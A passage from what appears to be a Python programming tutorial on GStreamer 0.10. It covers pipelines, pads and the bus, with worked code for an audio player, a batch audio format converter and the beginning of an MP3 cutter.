format and saving the output. As stated earlier, linking these element objects in a proper manner creates a pipeline. The concept of a pipeline is similar to the one used in Unix. Following is a Unix example of a pipeline. Here, the vertical separator | defines the pipe. $ls -la | more Here, the ls -la lists all the files in a directory. However, sometimes, this list is too long to be displayed in the shell window. So, adding | more allows a user to navigate the data. Now let's see a realistic example of running GStreamer from the command prompt. $ gst-launch-0.10 -v filesrc location=path/to/file.ogg ! decodebin ! audioconvert ! fakesink For a Windows user, the gst command name would be gst-launch-0.10.exe. The pipeline is constructed by specifying different elements. The !symbol links the adjacent elements, thereby forming the whole pipeline for the data to flow. For Python bindings of GStreamer, the abstract base class for pipeline elements is gst.Element, whereas gst.Pipeline class can be used to created pipeline instance. In a pipeline, the data is sent to a separate thread where it is processed until it reaches the end or a termination signal is sent. Plugins GStreamer is a plugin-based framework. There are several plugins available. A plugin is used to encapsulate the functionality of one or more GStreamer elements. Thus we can have a plugin where multiple elements work together to create the desired output. The plugin itself can then be used as an abstract element in the GStreamer pipeline. An example is decodebin. We will learn about it in the upcoming sections. A comprehensive list of available plugins is available at the GStreamer website. In almost all applications to be developed, decodebin plugin will be used. For audio processing, the functionality provided by plugins such as gnonlin, audioecho, monoscope, interleave, and so on will be used. Bins In GStreamer, a bin is a container that manages the element objects added to it. A bin instance can be created using gst.Bin class. It is inherited from gst.Element and can act as an abstract element representing a bunch of elements within it. A GStreamer plugin decodebin is a good example representing a bin. The decodebin contains decoder elements. It auto-plugs the decoder to create the decoding pipeline. Pads Each element has some sort of connection points to handle data input and output. GStreamer refers to them as pads. Thus an element object can have one or more "receiver pads" termed as sink pads that accept data from the previous element in the pipeline. Similarly, there are 'source pads' that take the data out of the element as an input to the next element (if any) in the pipeline. The following is a very simple example that shows how source and sink pads are specified. >gst-launch-0.10.exe fakesrc num-bufferes=1 ! fakesink The fakesrc is the first element in the pipeline. Therefore, it only has a source pad. It transmits the data to the next linkedelement, that is fakesink which only has a sink pad to accept elements. Note that, in this case, since these are fakesrc and fakesink, just empty buffers are exchanged. A pad is defined by the class gst.Pad. A pad can be attached to an element object using the gst.Element.add_pad() method. The following is a diagrammatic representation of a GStreamer element with a pad. It illustrates two GStreamer elements within a pipeline, having a single source and sink pad. Now that we know how the pads operate, let's discuss some of special types of pads. In the example, we assumed that the pads for the element are always 'out there'. However, there are some situations where the element doesn't have the pads available all the time. Such elements request the pads they need at runtime. Such a pad is called a dynamic pad. Another type of pad is called ghost pad. These types are discussed in this section. Dynamic pads Some objects such as decodebin do not have pads defined when they are created. Such elements determine the type of pad to be used at the runtime. For example, depending on the media file input being processed, the decodebin will create a pad. This is often referred to as dynamic pad or sometimes the available pad as it is not always available in elements such as decodebin. Ghost pads As stated in the Bins section a bin object can act as an abstract element. How is it achieved? For that, the bin uses 'ghost pads' or 'pseudo link pads'. The ghost pads of a bin are used to connect an appropriate element inside it. A ghost pad can be created using gst.GhostPad class. Caps The element objects send and receive the data by using the pads. The type of media data that the element objects will handle is determined by the caps (a short form for capabilities). It is a structure that describes the media formats supported by the element. The caps are defined by the class gst.Caps. Bus A bus refers to the object that delivers the message generated by GStreamer. A message is a gst.Message object that informs the application about an event within the pipeline. A message is put on the bus using the gst.Bus.gst_bus_post() method. The following code shows an example usage of the bus. 1 bus = pipeline.get_bus() 2 bus.add_signal_watch() 3 bus.connect("message", message_handler) The first line in the code creates a gst.Bus instance. Here the pipeline is an instance of gst.PipeLine. On the next line, we add a signal watch so that the bus gives out all the messages posted on that bus. Line 3 connects the signal with a Python method. In this example, the message is the signal string and the method it calls is message_handler. Playbin/Playbin2 Playbin is a GStreamer plugin that provides a high-level audio/video player. It can handle a number of things such as automatic detection of the input media file format, auto-determination of decoders, audio visualization and volume control, and so on. The following line of code creates a playbin element. playbin = gst.element_factory_make("playbin") It defines a property called uri. The URI (Uniform Resource Identifier) should be an absolute path to a file on your computer or on the Web. According to the GStreamer documentation, Playbin2 is just the latest unstable version but once stable, it will replace the Playbin. A Playbin2 instance can be created the same way as a Playbin instance. gst-inspect-0.10 playbin2 With this basic understanding, let us learn about various audio processing techniques using GStreamer and Python. (For more resources on Python, see here.) Playing music Given an audio file, one the first things you will do is to play that audio file, isn't it? In GStreamer, what basic elements do we need to play an audio? The essential elements are listed as follows. - The first thing we need is to open an audio file for reading - Next, we need a decoder to transform the encoded information - Then, there needs to be an element to convert the audio format so that it is in a 'playable' format required by an audio device such as speakers - Finally, an element that will enable the actual playback of the audio file How will you play an audio file using the command-line version of GStreamer? One way to execute it using command line is as follows: $gstlaunch-0.10 filesrc location=/path/to/audio.mp3 ! decodebin ! audioconvert ! autoaudiosink The autoaudiosink automatically detects the correct audio device on your computer to play the audio. This was tested on a machine with Windows XP and it worked fine. If there is any error playing an audio, check if the audio device on your computer is working properly. You can also try using element sdlaudiosink that outputs to the sound card via SDLAUDIO. If this doesn't work, and you want to install a plugin for audiosink—here is a partial list of GStreamer plugins: Mac OS X users can try installing osxaudiosink if the default autoaudiosink doesn't work. The audio file should start playing with this command unless there are any missing plugins. Time for action – playing an audio: method 1 There are a number of ways to play an audio using Python and GStreamer. Let's start with a simple one. In this section, we will use a command string, similar to what you would specify using the command-line version of GStreamer. This string will be used to construct a gst.Pipeline instance in a Python program. So, here we go! - Start by creating an AudioPlayer class in a Python source file. Just define the empty methods illustrated in the following code snippet. We will expand those in the later steps. 1 import thread 2 import gobject 3 import pygst 4 pygst.require("0.10") 5 import gst 6 7 class AudioPlayer: 8 def __init__(self): 9 pass 10 def constructPipeline(self): 11 pass 12 def connectSignals(self): 13 pass 14 def play(self): 15 pass 16 def message_handler(self): 17 pass 18 19 # Now run the program 20 player = AudioPlayer() 21 thread.start_new_thread(player.play, ()) 22 gobject.threads_init() 23 evt_loop = gobject.MainLoop() 24 evt_loop.run() Lines 1 to 5 in the code import the necessary modules. As discussed in the Installation prerequisites section, the package pygst is imported first. Then we call pygst.require to enable the import of gst module. - Now focus on the code block between lines 19 to 24. It is the main execution code. It enables running the program until the music is played. We will use this or similar code throughout to run our audio application. On line 21, the thread module is used to create a new thread for playing the audio. The method AudioPlayer.play is sent on this thread. The second argument of thread.start_new_thread is the list of arguments to be passed to the method play. In this example, we do not support any command-line arguments. Therefore, an empty tuple is passed. Python adds its own thread management functionality on top of the operating system threads. When such a thread makes calls to external functions (such as C functions), it puts the 'Global Interpreter Lock' on other threads until, for instance, the C function returns a value. The gobject.threads_init() is an initialization function for facilitating the use of Python threading within the gobject modules. It can enable or disable threading while calling the C functions. We call this before running the main event loop. The main event loop for executing this program is created using gobject on line 23 and this loop is started by the call evt_loop.run(). - Next, fill the AudioPlayer class methods with the code. First, write the constructor of the class. 1 def __init__(self): 2 self.constructPipeline() 3 self.is_playing = False 4 self.connectSignals() The pipeline is constructed by the method call on line 2. The flag self.is_playing is initialized to False. It will be used to determine whether the audio being played has reached the end of the stream. On line 4, a method self.connectSignals is called, to capture the messages posted on a bus. We will discuss both these methods next. - The main driver for playing the sound is the following gst command: "filesrc location=C:/AudioFiles/my_music.mp3 "\ "! decodebin ! audioconvert ! autoaudiosink" The preceding string has four elements separated by the symbol !. These elements represent the components we briefly discussed earlier. - The first element filesrc location=C:/AudioFiles/my_music.mp3 defines the source element that loads the audio file from a given location. In this string, just replace the audio file path represented by location with an appropriate file path on your computer. You can also specify a file on a disk drive. If the filename contains namespaces, make sure you specify the path within quotes. For example, if the filename is my sound.mp3, specify it as follows: filesrc location =\"C:/AudioFiles/my sound.mp3\" - The next element loads the file. This element is connected to a decodebin. As discussed earlier, the decodebin is a plugin to GStreamer and it inherits gst.Bin. Based on the input audio format, it determines the right type of decoder element to use. The third element is audioconvert. It translates the decoded audio data into a format playable by the audio device. The final element, autoaudiosink, is a plugin; it automatically detects the audio sink for the audio output. We have sufficient information now to create an instance of gst.Pipeline. Write the following method. 1 def constructPipeline(self): 2 myPipelineString = \ 3 "filesrc location=C:/AudioFiles/my_music.mp3 "\ 4 "! decodebin ! audioconvert ! autoaudiosink" 5 self.player = gst.parse_launch(myPipelineString) An instance of gst.Pipeline is created on line 5, using the gst.parse_launch method. - Now write the following method of class AudioPlayer. 1 def connectSignals(self): 2 # In this case, we only capture the messages 3 # put on the bus. 4 bus = self.player.get_bus() 5 bus.add_signal_watch() 6 bus.connect("message", self.message_handler) On line 4, an instance of gst.Bus is created. In the introductory section on GStreamer, we already learned what the code between lines 4 to 6 does. This bus has the job of delivering the messages posted on it from the streaming threads. The add_signal_watch call makes the bus emit the message signal for each message posted. This signal is used by the method message_handler to take appropriate action. Write the following method: 1 def play(self): 2 self.is_playing = True 3 self.player.set_state(gst.STATE_PLAYING) 4 while self.is_playing: 5 time.sleep(1) 6 evt_loop.quit() On line 2, we set the state of the gst pipeline to gst.STATE_PLAYING to start the audio streaming. The flag self.is_playing controls the while loop on line 4. This loop ensures that the main event loop is not terminated before the end of the audio stream is reached. Within the loop the call to time.sleep just buys some time for the audio streaming to finish. The value of flag is changed in the method message_handler that watches for the messages from the bus. On line 6, the main event loop is terminated. This gets called when the end of stream message is emitted or when some error occurs while playing the audio. - Next, develop method AudioPlayer.message_handler. This method sets the appropriate flag to terminate the main loop and is also responsible for changing the playing state of the pipeline. 1 def message_handler(self, bus, message): 2 # Capture the messages on the bus and 3 # set the appropriate flag. 4 msgType = message.type 5 if msgType == gst.MESSAGE_ERROR: 6 self.player.set_state(gst.STATE_NULL) 7 self.is_playing = False 8 print "\n Unable to play audio. Error: ", \ 9 message.parse_error() 10 elif msgType == gst.MESSAGE_EOS: 11 self.player.set_state(gst.STATE_NULL) 12 self.is_playing = False In this method, we only check two things: whether the message on the bus says the streaming audio has reached its end (gst.MESSAGE_EOS) or if any error occurred while playing the audio stream (gst.MESSAGE_ERROR). For both these messages, the state of the gst pipeline is changed from gst.STATE_PLAYING to gst.STATE_NULL. The self.is_playing flag is updated to instruct the program to terminate the main event loop. We have defined all the necessary code to play the audio. Save the file as PlayingAudio.py and run the application from the command line as follows: $python PlayingAudio.py This will begin playback of the input audio file. Once it is done playing, the program will be terminated. You can press Ctrl + C on Windows or Linux to interrupt the playing of the audio file. It will terminate the program. What just happened? We developed a very simple audio player, which can play an input audio file. The code we wrote covered some of the most important components of GStreamer. These components will be useful throughout this article. The core component of the program was a GStreamer pipeline that had instructions to play the given audio file. Additionally, we learned how to create a thread and then start a gobject event loop to ensure that the audio file is played until the end. Have a go hero – play audios from a playlist The simple audio player we developed can only play a single audio file, whose path is hardcoded in the constructed GStreamer pipeline. Modify this program so it can play audios in a playlist. In this case, play list should define full paths of the audio files you would like to play, one after the other. For example, you can specify the file paths as arguments to this application or load the paths defined in a text file or load all audio files from a directory. Building a pipeline from elements In the last section, a gst.Pipeline was automatically constructed for us by the gst.parse_launch method. All it required was an appropriate command string, similar to the one specified while running the command-line version of GStreamer. The creation and linking of elements was handled internally by this method. In this section, we will see how to construct a pipeline by adding and linking individual element objects. 'GStreamer Pipeline' construction is a fundamental technique that we will use throughout this article. Time for action – playing an audio: method 2 We have already developed code for playing an audio. Let's now tweak the method AudioPlayer.constructPipeline to build the gst.Pipeline using different element objects. - Rewrite the constructPipeline method as follows. You can also download the file PlayingAudio.py from the Packt website for reference. 1 def constructPipeline(self): 2 self.player = gst.Pipeline() 3 self.filesrc = gst.element_factory_make("filesrc") 4 self.filesrc.set_property("location", 5 "C:/AudioFiles/my_music.mp3") 6 7 self.decodebin = gst.element_factory_make("decodebin", 8 "decodebin") 9 # Connect decodebin signal with a method. 10 # You can move this call to self.connectSignals) 11 self.decodebin.connect("pad_added", 12 self.decodebin_pad_added) 13 14 self.audioconvert = \ 15 gst.element_factory_make("audioconvert", 16 "audioconvert") 17 18 self.audiosink = \ 19 gst.element_factory_make("autoaudiosink", 20 "a_a_sink") 21 22 # Construct the pipeline 23 self.player.add(self.filesrc, self.decodebin, 24 self.audioconvert, self.audiosink) 25 # Link elements in the pipeline. 26 gst.element_link_many(self.filesrc, self.decodebin) 27 gst.element_link_many(self.audioconvert,self.audiosink) - We begin by creating an instance of class gst.Pipeline. - Next, on line 2, we create the element for loading the audio file. Any new gst element can be created using the API method, gst.element_factory_make. The method takes the element name (string) as an argument. For example, on line 3, this argument is specified as "filesrc" in order to create an instance of element GstFileSrc. Each element will have a set of properties. The path of the input audio file is stored in a property location of self.filesrc element. This property is set on line 4. Replace the file path string with an appropriate audio file path. You can get a list of all properties by running the 'gst-inspect-0.10 ' command from a console window. See the introductory section on GSreamer for more details. - The second optional argument serves as a custom name for the created object. For example, on line 20, the name for the autoaudiosink object is specified as a_a_sink. Like this, we create all the essential elements necessary to build the pipeline. - On line 23 in the code, all the elements are put in the pipeline by calling the gst.Pipeline.add method. - The method gst.element_link_many establishes connection between two or more elements for the audio data to flow between them. The elements are linked together by the code on lines 26 and 27. However, notice that we haven't linked together the elements self.decodebin and self.audioconvert. Why? That's up next. - We cannot link the decodebin element with the audioconvert element at the time the pipeline is created. This is because decodebin uses dynamic pads. These pads are not available for connection with the audioconvert element when the pipeline is created. Depending upon the input data , it will create a pad. Thus, we need to watch out for a signal that is emitted when the decodebin adds a pad! How do we do that? It is done by the code on line 11 in the code snippet above. The "pad-added" signal is connected with a method, decodebin_pad_added. Whenever decodebin adds a dynamic pad, this method will get called. - Thus, all we need to do is to manually establish a connection between decodebin and audioconvert elements in the method decodebin_pad_added. Write the following method. 1 def decodebin_pad_added(self, decodebin, pad ): 2 caps = pad.get_caps() 3 compatible_pad = \ 4 self.audioconvert.get_compatible_pad(pad, caps) 5 6 pad.link(compatible_pad) The method takes the element (in this case it is self.decodebin ) and pad as arguments. The pad is the new pad for the decodebin element. We need to link this pad with the appropriate one on self.audioconvert. - On line 2 in this code snippet, we find out what type of media data the pad handles. Once the capabilities (caps) are known, we pass this information to the method get_compatible_pad of object self.audioconvert. This method returns a compatible pad which is then linked with pad on line 6. - The rest of the code is identical with the one illustrated in the earlier section. You can run this program the same way described earlier. What just happened? We learned some very crucial components of GStreamer framework. With the simple audio player as an example, we created a GStreamer pipeline 'from scratch' by creating various element objects and linking them together. We also learned how to connect two elements by 'manually' linking their pads and why that was required for the element self.decodebin. Playing an audio from a website If there is an audio somewhere on a website that you would like to play, we can pretty much use the same AudioPlayer class developed earlier. In this section, we will illustrate the use of gst.Playbin2 to play an audio by specifying a URL. The code snippet below shows the revised AudioPlayer.constructPipeline method. The name of this method should be changed as it is playbin object that it creates. 1 def constructPipeline(self): 2 file_url = "" 3 buf_size = 1024000 4 self.player = gst.element_factory_make("playbin2") 5 self.player.set_property("uri", file_url) 6 self.player.set_property("buffer-size", buf_size) 7 self.is_playing = False 8 self.connectSignals() On line 4, the gst.Playbin2 element is created using gst.element_factory_make method. The argument to this method is a string that describes the element to be created. In this case it is playbi . You can also define a custom name for this object by supplying an optional second argument to this method. Next, on line 5 and 6, we assign values to the properties uri and buffer-size. Set the uri property to an appropriate URL , the full path to the audio file you would like to play. Note: When you execute this program, Python application tries to access the Internet. The anti-virus installed on your computer may block the program execution. In this case, you will need to allow this program to access the Internet. Also, you need to be careful of hackers. If you get the fil_url from an untrusted source, perform a safety check such as assert not re.match("file://", file_url). Have a go hero – use 'playbin' to play local audios In the last few sections, we learned different ways to play an audio file using Python and GStreamer. In the previous section, you must have noticed another simple way to achieve this, using a playbin or playbin2 object to play an audio. In the previous section, we learned how to play an audio file from a URL. Modify this code so that this program can now play audio files located in a drive on your computer. Hint: You will need to use the correct uri path. Convert the file path using Python's module urllib.pathname2url and then append it to the string: "file://". Converting audio file format Suppose you have a big collection of songs in wav file format that you would like to load on a cell phone. But you find out that the cell phone memory card doesn't have enough space to hold all these. What will you do? You will probably try to reduce the size of the song files right? Converting the files into mp3 format will reduce the size. Of course you can do it using some media player. Let's learn how to perform this conversion operation using Python and GStreamer. Later we will develop a simple command-line utility that can be used to perform a batch conversion for all the files you need. - Like in the earlier examples, let's first list the important building blocks we need to accomplish file conversion. The first three elements remain the same. - As before, the first thing we need is to load an audio file for reading. - Next, we need a decoder to transform the encoded information. - Then, there needs to be an element to convert the raw audio buffers into an appropriate format. - An encoder is needed that takes the raw audio data and encodes it to an appropriate file format to be written. - An element where the encoded data will be streamed to is needed. In this case it is our output audio file. Okay, what's next? Before jumping into the code, first check if you can achieve what you want using the command-line version of GStreamer. $gstlaunch-0.10.exe filesrc location=/path/to/input.wav ! decodebin ! audioconvert ! lame ! Filesink location=/path/to/output.mp3 Specify the correct input and output file paths and run this command to convert a wave file to an mp3. If it works, we are all set to proceed. Otherwise check for missing plugins. You should refer to the GStreamer API documentation to know more about the properties of various elements illustrated above. Trust me, the gst-inspect-0.10 (or gst-inspect-0.10.exe for Windows users) command is a very handy tool that will help you understand the components of a GStreamer plugin. The instructions on running this tool are already discussed earlier in this article. (For more resources on Python, see here.) Time for action – audio file format converter Let's write a simple audio file converter. This utility will batch process input audio files and save them in a user-specified file format. To get started, download the file AudioConverter.py from the Packt website. This file can be run from the command line as: python AudioConverter.py [options] Where, the [options] are as follows: - --input_dir: The directory from which to read the input audio file(s) to be converted. - --input_format: The audio format of the input files. The format should be in a supported list of formats. The supported formats are "mp3", "ogg", and "wav". If no format is specified, it will use the default format as ".wav". - --output_dir : The output directory where the converted files will be saved. If no output directory is specified, it will create a folder OUTPUT_AUDIOS within the input directory. - --output_format: The audio format of the output file. Supported output formats are "wav" and "mp3". Let's write this code now. - Start by importing necessary modules. import os, sys, time import thread import getopt, glob import gobject import pygst pygst.require("0.10") import gst - Now declare the following class and the utility function. As you will notice, several of the methods have the same names as before. The underlying functionality of these methods will be similar to what we already discussed. In this section we will review only the most important methods in this class. You can refer to file AudioConverter.py for other methods or develop those on your own. def audioFileExists(fil): return os.path.isfile(fil) class AudioConverter: def __init__(self): pass def constructPipeline(self): pass def connectSignals(self): pass def decodebin_pad_added(self, decodebin, pad): pass def processArgs(self): pass def convert(self): pass def convert_single_audio(self, inPath, outPath): pass def message_handler(self, bus, message): pass def printUsage(self): pass def printFinalStatus(self, inputFileList, starttime, endtime): pass # Run the converter converter = AudioConverter() thread.start_new_thread(converter.convert, ()) gobject.threads_init() evt_loop = gobject.MainLoop() evt_loop.run() - Look at the last few lines of code above. This is exactly the same code we used in the Playing Music section. The only difference is the name of the class and its method that is put on the thread in the call thread.start_new_thread. At the beginning, the function audioFileExists() is declared. It will be used to check if the specified path is a valid file path. - Now write the constructor of the class. Here we do initialization of various variables. def __init__(self): # Initialize various attrs self.inputDir = os.getcwd() self.inputFormat = "wav" self.outputDir = "" self.outputFormat = "" self.error_message = "" self.encoders = {"mp3":"lame", "wav": "wavenc"} self.supportedOutputFormats = self.encoders.keys() self.supportedInputFormats = ("ogg", "mp3", "wav") self.pipeline = None self.is_playing = False self.processArgs() self.constructPipeline() self.connectSignals() - The self.supportedOutputFormats is a tuple that stores the supported output formats. self.supportedInputFormatsis a list obtained from the keys of self.encoders and stores the supported input formats. These objects are used in self.processArgumentsto do necessary checks. The dictionary self.encoders provides the correct type of encoder string to be used to create an encoder element object for the GStreamer pipeline. As the name suggests, the call to self.constructPipeline() builds a gst.Pipeline instance and various signals are connected using self.connectSignals(). - Next, prepare a GStreamer pipeline. def constructPipeline(self): self.pipeline = gst.Pipeline("pipeline") self.filesrc = gst.element_factory_make("filesrc") self.decodebin = gst.element_factory_make("decodebin") self.audioconvert = gst.element_factory_make( "audioconvert") self.filesink = gst.element_factory_make("filesink") encoder_str = self.encoders[self.outputFormat] self.encoder= gst.element_factory_make(encoder_str) self.pipeline.add( self.filesrc, self.decodebin, self.audioconvert, self.encoder, self.filesink) gst.element_link_many(self.filesrc, self.decodebin) gst.element_link_many(self.audioconvert, self.encoder, self.filesink) - This code is similar to the one we developed in the Playing Music sub-section. However there are some noticeable differences. In the Audio Player example, we used the autoaudiosink plugin as the last element. In the Audio Converter, we have replaced it with elements self.encoder and self.filesink. The former encodes the audio data coming out of the self.audioconvert. The encoder will be linked to the sink element. In this case, it is a filesink. The self.filesink is where the audio data is written to a file given by the location property. - The encoder string, encoder_str determines the type of encoder element to create. For example, if the output format is specified as "mp3" the corresponding encoder to use is "lame" mp3 encoder. You can run the gst-inspect-0.10 command to know more about the lame mp3 encoder. The following command can be run from shell on Linux. $gst-inspect-0.10 lame - The elements are added to the pipeline and then linked together. As before, the self.decodebin and self.audioconvert are not linked in this method as the decodebin plugin uses dynamic pads. The pad_added signal from the self.decodebin is connected in the self.connectSignals() method. - Another noticeable change is that we have not set the location property for both, self.filesrc and self.filesink. These properties will be set at the runtime. The input and output file locations keep on changing as the tool is a batch processing utility. - Let's write the main method that controls the conversion process. 1 def convert(self): 2 pattern = "*." + self.inputFormat 3 filetype = os.path.join(self.inputDir, pattern) 4 fileList = glob.glob(filetype) 5 inputFileList = filter(audioFileExists, fileList) 6 7 if not inputFileList: 8 print "\n No audio files with extension %s "\ 9 "located in dir %s"%( 10 self.outputFormat, self.inputDir) 11 return 12 else: 13 # Record time before beginning audio conversion 14 starttime = time.clock() 15 print "\n Converting Audio files.." 16 17 # Save the audio into specified file format. 18 # Do it in a for loop If the audio by that name already 19 # exists, do not overwrite it 20 for inPath in inputFileList: 21 dir, fil = os.path.split(inPath) 22 fil, ext = os.path.splitext(fil) 23 outPath = os.path.join( 24 self.outputDir, 25 fil + "." + self.outputFormat) 26 27 28 print "\n Input File: %s%s, Conversion STARTED..."\ 29 % (fil, ext) 30 self.convert_single_audio(inPath, outPath) 31 if self.error_message: 32 print "\n Input File: %s%s, ERROR OCCURED" \ 33 % (fil, ext) 34 print self.error_message 35 else: 36 print "\nInput File: %s%s,Conversion COMPLETE"\ 37 % (fil, ext) 38 39 endtime = time.clock() 40 41 self.printFinalStatus(inputFileList, starttime, 42 endtime) 43 evt_loop.quit() - All the input audio files are collected in the list inputFileList by the code between lines 2 to 6. Then, we loop over each of these files. First, the output file path is derived based on user inputs and then the input file path. - The highlighted line of code is the workhorse method, AudioConverter.convert_single_audio, that actually does the job of converting the input audio. We will discuss that method next. On line 43, the main event loop is terminated. The rest of the code in method convert is self-explanatory. - The code in method convert_single_audio is illustrated below. 1 def convert_single_audio(self, inPath, outPath): 2 inPth = repr(inPath) 3 outPth = repr(outPath) 4 5 # Set the location property for file source and sink 6 self.filesrc.set_property("location", inPth[1:-1]) 7 self.filesink.set_property("location", outPth[1:-1]) 8 9 self.is_playing = True 10 self.pipeline.set_state(gst.STATE_PLAYING) 11 while self.is_playing: 12 time.sleep(1) - As mentioned in the last step, convert_single_audio method is called within a for loop in the self.convert(). The for loop iterates over a list containing input audio file paths. The input and output file paths are given as arguments to this method. The code between lines 8-12 looks more or less similar to AudioPlayer.play() method illustrated in the Play audio section. The only difference is the main event loop is not terminated in this method. Earlier we did not set the location property for the file source and sink. These properties are set on lines 6 and 7 respectively. - Now what's up with the code on lines 2 and 3? The call repr(inPath) returns a printable representation of the string inPath. The inPathis obtained from the 'for loop'. The os.path.normpath doesn't work on this string. In Windows, if you directly use inPath, GStreamer will throw an error while processing such a path string. One way to handle this is to use repr(string) , which will return the whole string including the quotes . For example: if inPath be "C:/AudioFiles/my_music.mp3" , then repr(inPath) will return in "'C:\\\\AudioFiles\\\\my_music.mp3'". Notice that it has two single quotes. We need to get rid of the extra single quotes at the beginning and end by slicing the string as inPth[1:-1]. There could be some other better ways. You can come up with one and then just use that code as a path string! - Let's quickly skim through a few more methods. Write these down: def connectSignals(self): # Connect the signals. # Catch the messages on the bus bus = self.pipeline.get_bus() bus.add_signal_watch() bus.connect("message", self.message_handler) # Connect the decodebin "pad_added" signal. self.decodebin.connect("pad_added", self.decodebin_pad_added) def decodebin_pad_added(self, decodebin, pad): caps = pad.get_caps() compatible_pad=\ self.audioconvert.get_compatible_pad(pad, caps) pad.link(compatible_pad) - The connectSignal method is identical to the one discussed in the Playing music section, except that we are also connecting the decodebin signal with a method decodebin_pad_added. Add a print statement to decodebin_pad_added to check when it gets called. It will help you understand how the dynamic pad works! The program starts by processing the first audio file. The method convert_single_audio gets called. Here, we set the necessary file paths. After that, it begins playing the audio file. At this time, the pad_addedsignal is generated. Thus based on the input file data, decodebin will create the pad. - The rest of the methods such as processArgs, printUsage, and message_handler are self-explanatory. You can review these methods from the file AudioConverter.py. - The audio converter should be ready for action now! Make sure that all methods are properly defined and then run the code by specifying appropriate input arguments. The following screenshot shows a sample run of audio conversion utility on Windows XP. Here, it will batch process all audio files in directory C:\AudioFiles with extension .ogg and convert them into mp3 file format . The resultant mp3 files will be created in directory C:\AudioFiles\OUTPUT_AUDIOS. What just happened? A basic audio conversion utility was developed in the previous section. This utility can batch-convert audio files with ogg or mp3 or wav format into user-specified output format (where supported formats are wav and mp3). We learned how to specify encoder and filesink elements and link them in the GStreamer pipeline. To accomplish this task, we also applied knowledge gained in earlier sections such as creation of GStreamer pipeline, capturing bus messages, running the main event loop, and so on. Have a go hero – do more with audio converter The audio converter we wrote is fairly simple. It deserves an upgrade. Extend this application to support more audio output formats such as ogg, flac, and so on. The following pipeline illustrated one way of converting an input audio file into ogg file format. filesrc location=input.mp3 ! decodebin ! audioconvert ! vorbisenc ! oggmux ! filesink location=output.ogg Notice that we have an audio muxer, oggmux, that needs to be linked with encoder vorbisenc. Similarly, to create an MP4 audio file, it will need {faac ! mp4mux} as encoder and audio muxer. One of the simplest things to do is to define proper elements (such as encoder and muxer) and instead of constructing a pipeline from individual elements, use the gst.parse_launch method we studied earlier and let it automatically create and link elements using the command string. You can create a pipeline instance each time the audio conversion is called for. But in this case you would also need to connect signals each time the pipeline is created. Another better and simpler way is to link the audio muxer in the AudioConverter.constructPipeline method. You just need to check if it is needed based on the type of plugin you are using for encoding. In this case the code will be: gst.element_link_many(self.audioconvert, self.encoder, self.audiomuxer, self.filesink) The audio converter illustrated in this example takes input files of only a single audio file format. This can easily be extended to accept input audio files in all supported file formats (except for the type specified by the --output_format option). The decodebin should take care of decoding the given input data. Extend Audio Converter to support this feature. You will need to modify the code in the AudioConverter.convert() method where the input file list is determined. Extracting part of an audio Suppose you have recorded a live concert of your favorite musician or a singer. You have saved all this into a single file with MP3 format but you would like to break this file into small pieces. There is more than one way to achieve this using Python and GStreamer. We will use the simplest and perhaps the most efficient way of cutting a small piece from an audio track. It makes use of an excellent GStreamer plugin, called Gnonlin. The Gnonlin plugin The multimedia editing can be classified as linear or non-linear. Non-linear multimedia editing enables control over the media progress in an interactive way. For example, it allows you to control the order in which the sources should be executed. At the same time it allows modifications to the position in a media track. While doing all this, note that the original source (such as an audio file) remains unchanged. Thus the editing is non-destructive. The Gnonlin or (G-Non-Linear) provides essential elements for non-linear editing of a multimedia. It has five major elements, namely, gnlfilesource, gnlurisource, gnlcomposition, gnloperation, and gnlsource. To know more about their properties, run gst-inspect-0.10 command on each of these elements. Here, we will only focus on the element gnlfilesource and a few of its properties. This is really a GStreamer bin element. Like decodebin, it determines which pads to use at the runtime. As the name suggests, it deals with the input media file. All you need to specify is the input media source it needs to handle. The media file format can be any of the supported media formats. The gnlfilesource defines a number of properties. To extract a chunk of an audio, we just need to consider three of them: - media-start: The position in the input media file, which will become the start position of the extracted media. This is specified in nanoseconds. - media-duration: Total duration of the extracted media file (beginning from media-start). This is specified in nanoseconds as well. - uri: The full path of the input media file. For example, if it is a file on your local hard drive, the uri will be something like. If the file is located on a website, then the uri will something of this sort:. The gnlfilesource internally does operations like loading and decoding the file, seeking the track to the specified position, and so on. This makes our job easier. We just need to create basic elements that will process the information furnished by gnlfilesource, to create an output audio file. Now that we know the basics of gnlfilesource, let's try to come up with a GStreamer pipeline that will cut a portion of an input audio file. - First the gnlfilesource element that does the crucial job of loading, decoding the file, seeking the correct start position, and finally presenting us with an audio data that represents the portion of track to be extracted. - An audioconvert element that will convert this data into an appropriate audio format. - An encoder that encodes this data further into the final audio format we want. - A sink where the output data is dumped. This specifies the output audio file. Try running the following from the command prompt by replacing the uri and location paths with appropriate file paths on your computer. $gst-launch-0.10.exe gnlfilesource uri= media-start=0 media-duration=15000000000 ! audioconvert ! lame ! filesink location=C:/my_chunk.mp3 This should create an extracted audio file of duration 15 seconds, starting at the initial position on the original file. Note that the media-start and media-duration properties take the input in nanoseconds. This is really the essence of what we will do next. Time for action – MP3 cutter! In this section we will develop a utility that will cut out a portion of an MP3 formatted audio and save it as a separate file. - Keep the file AudioCutter.py handy. You can download it from the Packt website. Here we will only discuss important methods. The methods not discussed here are similar to the ones from earlier examples. Review the file AudioCutter.py which has all the necessary source code to run this application. - Start the usual way. Do the necessary imports and write the following skeleton code. import os, sys, time import thread import gobject import pygst pygst.require("0.10") import gst class AudioCutter: def __init__(self): pass def constructPipeline(self): pass def gnonlin_pad_added(self, gnonlin_elem, pad): pass def connectSignals(self): pass def run(self): pass def printFinalStatus(self): pass def message_handler(self, bus, message): pass #Run the program audioCutter = AudioCutter() thread.start_new_thread(audioCutter.run, ()) gobject.threads_init() evt_loop = gobject.MainLoop() evt_loop.run() The overall code layout looks familiar doesn't it? The code is very similar to the code we developed earlier in this article. The key here is the appropriate choice of the file source element and linking it with the rest of the pipeline! The last few lines of code create a thread with method AudioCutter.run and run the main event loop as seen before. - Now fill in the constructor of the class. We will keep it simple this time. The things we need will be hardcoded within the constructor of the class AudioCutter. It is very easy to implement a processArgs() method as done on many occasions before. Replace the input and output file locations in the code snippet with a proper audio file path on your computer. def __init__(self): self.is_playing = False # Flag used for printing purpose only. self.error_msg = '' self.media_start_time = 100 self.media_duration = 30 self.inFileLocation = "C:\AudioFiles\my_music.mp3" self.outFileLocation = "C:\AudioFiles\my_music_chunk.mp3" self.constructPipeline() self.connectSignals() - The self.media_start_time is the new starting position of the mp3 file in seconds. This is the new start position for the extracted output audio. The self.duration variable stores the total duration extracted track. Thus, if you have an audio file with a total duration of 5 minutes, the extracted audio will have a starting position corresponding to 1 min, 40 seconds on the original track. The total duration of this output file will be 